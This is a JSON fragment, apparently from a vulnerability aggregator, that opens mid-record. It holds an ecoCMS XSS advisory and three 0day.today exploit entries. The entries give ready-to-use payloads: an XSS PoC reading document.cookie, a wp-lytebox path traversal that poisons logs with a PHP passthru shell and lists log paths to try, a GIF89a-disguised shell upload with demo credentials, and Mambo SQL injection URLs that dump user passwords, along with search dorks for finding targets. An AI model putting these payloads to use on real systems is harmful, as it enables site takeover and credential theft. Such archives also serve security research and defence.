Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n\r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available: \r\n\r\n\r\nhttp://example.com/admin.php?p=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E\r\n\r\n", "modified": "2010-05-04T00:00:00", "published": "2010-05-04T00:00:00", "id": "SECURITYVULNS:DOC:23757", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23757", "title": "XSS in ecoCMS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-01T20:58:47", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-05-26T00:00:00", "published": "2009-05-26T00:00:00", "id": "1337DAY-ID-5246", "href": "https://0day.today/exploit/description/5246", "type": "zdt", "title": "Wordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability", "sourceData": "========================================================================\r\nWordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability\r\n========================================================================\r\n\r\n\r\nWP Plugin Lytebox Local File Include and Remote Code Exe.\r\n\r\nDownload ; http://grupenet.com/wp-content/uploads/wp-lytebox.zip\r\n\r\nAuthor : TurkGuvenligi\r\n\r\nAgd_Scorp - t4cs1zkr4L - TheHacker - Fatih - BLaSTeR\r\n\r\nLFI;\r\n\r\nhttp://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/profile%00\r\n\r\nRCE;\r\n\r\nopen cmd (cmd ac?yoruz)\r\n\r\nnc -vv 127.0.0.1 80 (connecting)\r\nGET /<?php passthru(\\$_GET[cmd]); ?> HTTP/1.0\r\nHost : www.target.com\r\n\r\nOur error is recorded and access_log :) 
yeah\r\n\r\nhttp://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../var/log/apache2/access_log&cmd=[RCE]\r\n\r\naccess_log file ;\r\n\r\n\r\n../../../../../../../../../../etc/httpd/logs/error_log\r\n../../../../../../../../../../etc/httpd/logs/error.log\r\n../../../../../../../../../../etc/httpd/logs/access_log\r\n../../../../../../../../../../etc/httpd/logs/access.log\r\n../../../../../../../../../../var/log/apache/error_log\r\n../../../../../../../../../../var/log/apache/error.log\r\n../../../../../../../../../../var/log/apache/access_log\r\n../../../../../../../../../../var/log/apache/access.log\r\n../../../../../../../../../../var/log/apache2/error_log\r\n../../../../../../../../../../var/log/apache2/error.log\r\n../../../../../../../../../../var/log/apache2/access_log\r\n../../../../../../../../../../var/log/apache2/access.log\r\n../../../../../../../../../../var/www/logs/error_log\r\n../../../../../../../../../../var/www/logs/error.log\r\n../../../../../../../../../../var/www/logs/access_log\r\n../../../../../../../../../../var/www/logs/access.log\r\n../../../../../../../../../../usr/local/apache/logs/error_log\r\n../../../../../../../../../../usr/local/apache/logs/error.log\r\n../../../../../../../../../../usr/local/apache/logs/access_log\r\n../../../../../../../../../../usr/local/apache/logs/access.log\r\n../../../../../../../../../../var/log/error_log\r\n../../../../../../../../../../var/log/error.log\r\n../../../../../../../../../../var/log/access_log\r\n../../../../../../../../../../var/log/access.log\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5246"}, {"lastseen": "2018-01-05T15:11:12", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-01-02T00:00:00", "published": "2009-01-02T00:00:00", "id": "1337DAY-ID-4591", "href": 
"https://0day.today/exploit/description/4591", "type": "zdt", "title": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability", "sourceData": "==================================================================\r\nBuilt2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability\r\n==================================================================\r\n\r\n\r\n[~] Built2Go PHP Rate My Photo v1.46.4 RFU\r\n[~]\r\n[~]----------------------------------------------------------\r\n[~] Discovered By: ZoRLu \r\n[~]\r\n[~] Date: 22.11.2008\r\n[~]\r\n[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (\r\n[~]\r\n[~] dork mu :) \"My Photo v1.46.4 \u00c2\u00a9 Big Resources\" ( for yahoo )\r\n[~]\r\n[~] onemli N0TT: arkadaslar hepimiz biliyoruz ki arama motoru yalnIzca google deil \r\n[~]\r\n[~] bide yahoo yu deneyin sonra hic site yok dersiniz xD\r\n[~]\r\n[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )\r\n[~] -----------------------------------------------------------\r\n\r\nfirst register to site \r\n\r\nyou add this code your shell to head \r\n\r\nGIF89a; \r\n\r\nexample your_shell.php:\r\n\r\nGIF89a;\r\n<?\r\n\r\n...\r\n\r\n...\r\n\r\n...\r\n\r\n?>\r\n\r\nand save your_sheell.php\r\n\r\nafter go member.php\r\n\r\nselect your shell.php and your shell here:\r\n\r\nhttp://z0rlu.blogspot.com/script/pictures/[id]shell.php\r\n\r\nexp:\r\n\r\ndemo:\r\n\r\nhttp://demos.built2go.com/rate%20my%20photo/1/\r\n\r\nlogin:\r\n\r\nhttp://demos.built2go.com/rate%20my%20photo/1/member.php\r\n\r\nuser: salla\r\n\r\npass: salla1\r\n\r\nshell:\r\n\r\nhttp://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4591"}, {"lastseen": "2018-02-14T00:43:30", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2008-01-31T00:00:00", 
"published": "2008-01-31T00:00:00", "id": "1337DAY-ID-2580", "href": "https://0day.today/exploit/description/2580", "type": "zdt", "title": "Mambo Component AkoGallery 2.5b SQL Injection Vulnerability", "sourceData": "===========================================================\r\nMambo Component AkoGallery 2.5b SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#########################################################################\r\n#\r\n#\r\n# joomla SQL Injection(com_akogallery)\r\n#\r\n#########################################################################\r\n#\r\n# DorKs 1 : allinurl: \"com_akogallery\"\r\n#\r\n########################################################################\r\nEXPLOIT :\r\n\r\nindex.php?option=com_akogallery&[email\u00a0protected]&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*\r\n\r\nindex.php?option=com_akogallery&[email\u00a0protected]&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*\r\n\r\n#########################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2580"}]}